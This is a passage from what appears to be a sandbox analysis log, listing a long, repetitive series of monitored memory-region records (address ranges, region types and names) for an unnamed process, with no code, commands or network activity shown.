"pagefile_0x0000000000460000" filename = "" Region: id = 6909 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6910 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6911 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6912 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6913 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6914 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6915 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6916 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6917 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6918 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6919 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6920 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6921 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6922 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6923 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6924 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6925 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6926 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6927 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6928 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6929 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6930 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6931 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6932 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6933 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6934 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6935 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6936 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6937 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6938 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6939 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6940 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6941 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6942 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6943 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6944 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6945 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6946 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6947 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6948 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6949 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6950 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6951 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6952 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6953 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6954 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6955 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6956 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6957 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6958 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6959 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6960 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6961 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6962 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6963 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6964 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6965 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6966 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6967 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6968 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6969 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6970 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6971 start_va = 0x90d0000 end_va = 0x91c9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000090d0000" filename = "" Region: id = 6972 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6973 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6974 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6975 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6976 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6977 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6978 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6979 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6980 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6981 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6982 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6983 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6984 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6985 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6987 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6988 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6989 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6990 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6991 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6992 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6993 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6998 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6999 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7000 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7001 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7002 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7003 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7007 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7008 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7009 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7010 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7011 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7012 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7013 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7014 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7015 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7016 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7023 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7024 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7025 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7026 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7027 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7032 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7033 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7034 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7035 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7037 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7038 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7039 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7040 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7041 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7042 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7043 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7044 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7050 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7051 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7052 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7053 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7054 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7055 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7056 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7057 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7058 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7059 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7060 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7061 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7062 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7063 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7064 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7065 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7066 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7067 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7068 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7069 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7070 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7071 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7072 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7073 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7074 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7075 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7076 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7077 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7078 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7079 start_va = 0xfd50000 end_va = 0x10241fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd50000" filename = "" Region: id = 7080 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7081 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7082 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7083 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7084 start_va = 0x460000 end_va = 0x462fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7085 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7086 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7087 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7088 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7089 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7090 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7091 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7092 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7093 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7094 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7095 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7096 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7097 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7098 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7099 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7100 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7101 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7102 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7103 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7104 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7105 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7106 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7107 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7108 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7109 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7110 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7111 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7112 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7113 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7114 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7115 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7116 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7117 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7118 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7119 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7120 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7121 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7122 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7123 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7124 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7125 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7126 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7127 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 7128 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7129 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7130 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7131 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = 